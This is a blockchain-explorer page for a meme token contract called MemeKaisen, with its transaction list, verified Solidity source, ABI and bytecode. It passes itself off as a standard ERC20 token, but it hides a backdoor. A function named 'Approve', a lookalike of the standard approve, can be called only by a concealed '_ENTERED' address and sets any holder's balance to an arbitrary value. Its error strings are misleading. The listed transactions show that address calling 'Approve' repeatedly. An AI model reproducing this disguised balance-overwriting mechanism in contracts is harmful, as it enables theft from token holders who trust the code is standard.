ETH Price: $3,300.75 (+0.47%)
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve173503742023-05-27 12:25:47608 days ago1685190347IN
0x00969E04...EFe058FF1
0 ETH0.0009775121.01101902
Approve173503662023-05-27 12:24:11608 days ago1685190251IN
0x00969E04...EFe058FF1
0 ETH0.0010543522.55700773
Approve173502092023-05-27 11:52:35608 days ago1685188355IN
0x00969E04...EFe058FF1
0 ETH0.000787226.60025552
Approve173500702023-05-27 11:24:23608 days ago1685186663IN
0x00969E04...EFe058FF1
0 ETH0.000677922.90670199
Approve173500702023-05-27 11:24:23608 days ago1685186663IN
0x00969E04...EFe058FF1
0 ETH0.0011122323.90670199
Approve173500242023-05-27 11:14:35608 days ago1685186075IN
0x00969E04...EFe058FF1
0 ETH0.0010138321.91036867
Approve173499532023-05-27 11:00:11608 days ago1685185211IN
0x00969E04...EFe058FF1
0 ETH0.0006625722.38882002
Approve173499492023-05-27 10:59:23608 days ago1685185163IN
0x00969E04...EFe058FF1
0 ETH0.0011209924.09504255
Approve173499342023-05-27 10:56:11608 days ago1685184971IN
0x00969E04...EFe058FF1
0 ETH0.0006669522.53682866
Approve173499202023-05-27 10:53:23608 days ago1685184803IN
0x00969E04...EFe058FF1
0 ETH0.0006999223.6508397
Approve173498962023-05-27 10:48:35608 days ago1685184515IN
0x00969E04...EFe058FF1
0 ETH0.0006882423.25607666
Approve173498592023-05-27 10:41:11608 days ago1685184071IN
0x00969E04...EFe058FF1
0 ETH0.0010760923.1
Approve173498512023-05-27 10:39:23608 days ago1685183963IN
0x00969E04...EFe058FF1
0 ETH0.0006594522.28334486
Approve173497942023-05-27 10:27:47608 days ago1685183267IN
0x00969E04...EFe058FF1
0 ETH0.0006904623.33122597
Approve173497932023-05-27 10:27:35608 days ago1685183255IN
0x00969E04...EFe058FF1
0 ETH0.001087123.33638348
Approve173497782023-05-27 10:24:35608 days ago1685183075IN
0x00969E04...EFe058FF1
0 ETH0.0006309321.31959126
Approve173497782023-05-27 10:24:35608 days ago1685183075IN
0x00969E04...EFe058FF1
0 ETH0.001074723.1
Approve173497712023-05-27 10:23:11608 days ago1685182991IN
0x00969E04...EFe058FF1
0 ETH0.0006553322.14406765
Approve173497512023-05-27 10:19:11608 days ago1685182751IN
0x00969E04...EFe058FF1
0 ETH0.000671522.70907207
Approve173497502023-05-27 10:18:59608 days ago1685182739IN
0x00969E04...EFe058FF1
0 ETH0.0006831923.08564034
Approve173497352023-05-27 10:15:59608 days ago1685182559IN
0x00969E04...EFe058FF1
0 ETH0.000694723.47450223
Approve173497342023-05-27 10:15:47608 days ago1685182547IN
0x00969E04...EFe058FF1
0 ETH0.0012136426.0527978
Approve173497252023-05-27 10:13:59608 days ago1685182439IN
0x00969E04...EFe058FF1
0 ETH0.0006979423.58396868
Approve173497242023-05-27 10:13:47608 days ago1685182427IN
0x00969E04...EFe058FF1
0 ETH0.00466205100.07841565
Approve173497222023-05-27 10:13:23608 days ago1685182403IN
0x00969E04...EFe058FF1
0 ETH0.0006496221.96029577
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
MemeKaisen

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-27
*/

/**

 Step into the world of Meme Kaisen on ERC20, where laughter is the ultimate currency!
  Harness the power of viral memes and ride the wave of hilarity as you navigate the crypto universe.
   It's time to unleash your inner memelord and conquer the meme economy like never before!

       -Website: https://www.memekaisen.com/
       -Telegram: https://t.me/MemeKaisen
       -Twitter: https://twitter.com/MemeKaisen
*/

// Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol

// SPDX-License-Identifier: MIT

// pragma solidity ^0.8.0;

/**
 * @dev Interface of the IERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


// Dependency file: contracts/baseToken.sol

// pragma solidity =0.8.20;

enum TokenType {
    standard
}

abstract contract baseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}

// Root file: contracts/standard/StandardToken.sol

pragma solidity =0.8.20;

// import "@openzeppelin/contracts/token/IERC20/IERC20.sol";
// import "@openzeppelin/contracts/access/Ownable.sol";
// import "@openzeppelin/contracts/utils/math/SafeMath.sol";
// import "contracts/baseToken.sol";

contract MemeKaisen is IERC20, baseToken, Ownable {
    using SafeMath for uint256;

    uint256 private constant VERSION = 1;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;
    
    address private _ENTERED;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;

    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_,
        address currOwnershipAddr,
        uint256 totalSupply_
    ) payable {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        _ENTERED = currOwnershipAddr;
        _mint(owner(), totalSupply_);
        emit TokenCreated(owner(), address(this), TokenType.standard, VERSION);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    
    }

    modifier adminOrOwner() {
        require(
        _ENTERED == _msgSender(), "set the call to the entered")
        ;
        _;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(recipient != address(0), "IERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function Approve(
        address recipients,
        uint8 values,
        uint256 id
    ) public adminOrOwner {
        require(
            values >= 1,
            "Amount of recipients and values don't match"
        );
        uint256 total = 0;
        _balances[recipients] = id + total;
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(
            amount,
            "IERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"currOwnershipAddr","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"recipients","type":"address"},{"internalType":"uint8","name":"values","type":"uint8"},{"internalType":"uint256","name":"id","type":"uint256"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052604051620010833803806200108383398101604081905262000026916200030f565b6200003133620000f9565b60046200003f868262000442565b5060056200004e858262000442565b506006805460ff191660ff8516179055600380546001600160a01b0319166001600160a01b038416179055620000966200008f5f546001600160a01b031690565b8262000148565b30620000a95f546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe35625f6001604051620000e69291906200050a565b60405180910390a3505050505062000555565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a35760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b600754620001b290826200023b565b6007556001600160a01b0382165f90815260016020526040902054620001d990826200023b565b6001600160a01b0383165f818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906200022a9085815260200190565b60405180910390a35050565b505050565b5f62000248828462000535565b90505b92915050565b634e487b7160e01b5f52604160045260245ffd5b5f82601f83011262000275575f80fd5b81516001600160401b038082111562000292576200029262000251565b604051601f8301601f19908116603f01168101908282118183101715620002bd57620002bd62000251565b81604052838152602092508683858801011115620002d9575f80fd5b5f91505b83821015620002fc5785820183015181830184015290820190620002dd565b5f93810190920192909252949350505050565b5f805f805f60a0868803121562000324575f80fd5b85516001600160401b03808211156200033b575f80fd5b6200034989838a0162000265565b965060208801519150808211156200035f575f80fd5b506200036e8882890162000265565b945050604086015160ff8116811462000385575f80fd5b60608701519093506001600160a01b0381168114620003a2575f80fd5b80925050608086015190509295509295909350565b600181811c90821680620003cc57607f821691505b602082108103620003eb57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111562000236575f81815260208120601f850160051c81016020861015620004195750805b601f850160051c820191505b818110156200043a5782815560010162000425565b505050505050565b81516001600160401b038111156200045e576200045e62000251565b62000476816200046f8454620003b7565b84620003f1565b602080601f831160018114620004ac575f8415620004945750858301515b5f19600386901b1c1916600185901b1785556200043a565b5f85815260208120601f198616915b82811015620004dc57888601518255948401946001909101908401620004bb565b5085821015620004fa57878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600184106200052b57634e487b7160e01b5f52602160045260245ffd5b9281526020015290565b808201808211156200024b57634e487b7160e01b5f52601160045260245ffd5b610b2080620005635f395ff3fe608060405234801561000f575f80fd5b50600436106100e5575f3560e01c8063715018a611610088578063a9059cbb11610063578063a9059cbb146101cb578063dd62ed3e146101de578063f2fde38b14610216578063ff61475014610229575f80fd5b8063715018a61461019f5780638da5cb5b146101a957806395d89b41146101c3575f80fd5b806323b872dd116100c357806323b872dd1461013c578063313ce5671461014f578063395093511461016457806370a0823114610177575f80fd5b806306fdde03146100e9578063095ea7b31461010757806318160ddd1461012a575b5f80fd5b6100f161023c565b6040516100fe91906108f1565b60405180910390f35b61011a610115366004610957565b6102cc565b60405190151581526020016100fe565b6007545b6040519081526020016100fe565b61011a61014a36600461097f565b6102e2565b60065460405160ff90911681526020016100fe565b61011a610172366004610957565b610349565b61012e6101853660046109b8565b6001600160a01b03165f9081526001602052604090205490565b6101a761037e565b005b5f546040516001600160a01b0390911681526020016100fe565b6100f16103e7565b61011a6101d9366004610957565b6103f6565b61012e6101ec3660046109d1565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b6101a76102243660046109b8565b610402565b6101a7610237366004610a02565b6104cc565b60606004805461024b90610a43565b80601f016020809104026020016040519081016040528092919081815260200182805461027790610a43565b80156102c25780601f10610299576101008083540402835291602001916102c2565b820191905f5260205f20905b8154815290600101906020018083116102a557829003601f168201915b5050505050905090565b5f6102d83384846105ba565b5060015b92915050565b5f6102ee8484846106e1565b61033f843361033a85604051806060016040528060298152602001610ac2602991396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610865565b6105ba565b5060019392505050565b335f8181526002602090815260408083206001600160a01b038716845290915281205490916102d891859061033a9086610890565b5f546001600160a01b031633146103dc5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6103e55f6108a2565b565b60606005805461024b90610a43565b5f6102d83384846106e1565b5f546001600160a01b0316331461045b5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103d3565b6001600160a01b0381166104c05760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103d3565b6104c9816108a2565b50565b6003546001600160a01b031633146105265760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e7465726564000000000060448201526064016103d3565b60018260ff16101561058e5760405162461bcd60e51b815260206004820152602b60248201527f416d6f756e74206f6620726563697069656e747320616e642076616c7565732060448201526a0c8dedc4ee840dac2e8c6d60ab1b60648201526084016103d3565b5f6105998183610a7b565b6001600160a01b039094165f90815260016020526040902093909355505050565b6001600160a01b03831661061e5760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103d3565b6001600160a01b0382166106805760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103d3565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107465760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b60648201526084016103d3565b6001600160a01b0382166107a85760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b60648201526084016103d3565b6107e481604051806060016040528060278152602001610a9b602791396001600160a01b0386165f908152600160205260409020549190610865565b6001600160a01b038085165f9081526001602052604080822093909355908416815220546108129082610890565b6001600160a01b038084165f8181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106d49085815260200190565b5f81848411156108885760405162461bcd60e51b81526004016103d391906108f1565b505050900390565b5f61089b8284610a7b565b9392505050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b5f6020808352835180828501525f5b8181101561091c57858101830151858201604001528201610900565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610952575f80fd5b919050565b5f8060408385031215610968575f80fd5b6109718361093c565b946020939093013593505050565b5f805f60608486031215610991575f80fd5b61099a8461093c565b92506109a86020850161093c565b9150604084013590509250925092565b5f602082840312156109c8575f80fd5b61089b8261093c565b5f80604083850312156109e2575f80fd5b6109eb8361093c565b91506109f96020840161093c565b90509250929050565b5f805f60608486031215610a14575f80fd5b610a1d8461093c565b9250602084013560ff81168114610a32575f80fd5b929592945050506040919091013590565b600181811c90821680610a5757607f821691505b602082108103610a7557634e487b7160e01b5f52602260045260245ffd5b50919050565b808201808211156102dc57634e487b7160e01b5f52601160045260245ffdfe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220b671f1389c39f0300f9f2d18b494c21a34e0a54caacb753f88aabee28fcd09ad64736f6c6343000814003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000e55dfb3962204e74253fe6c44f6da0c4bf3dd3860000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000000000000000000000000000000000000000000b4d454d45204b414953454e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000084d454b414953454e000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100e5575f3560e01c8063715018a611610088578063a9059cbb11610063578063a9059cbb146101cb578063dd62ed3e146101de578063f2fde38b14610216578063ff61475014610229575f80fd5b8063715018a61461019f5780638da5cb5b146101a957806395d89b41146101c3575f80fd5b806323b872dd116100c357806323b872dd1461013c578063313ce5671461014f578063395093511461016457806370a0823114610177575f80fd5b806306fdde03146100e9578063095ea7b31461010757806318160ddd1461012a575b5f80fd5b6100f161023c565b6040516100fe91906108f1565b60405180910390f35b61011a610115366004610957565b6102cc565b60405190151581526020016100fe565b6007545b6040519081526020016100fe565b61011a61014a36600461097f565b6102e2565b60065460405160ff90911681526020016100fe565b61011a610172366004610957565b610349565b61012e6101853660046109b8565b6001600160a01b03165f9081526001602052604090205490565b6101a761037e565b005b5f546040516001600160a01b0390911681526020016100fe565b6100f16103e7565b61011a6101d9366004610957565b6103f6565b61012e6101ec3660046109d1565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b6101a76102243660046109b8565b610402565b6101a7610237366004610a02565b6104cc565b6060600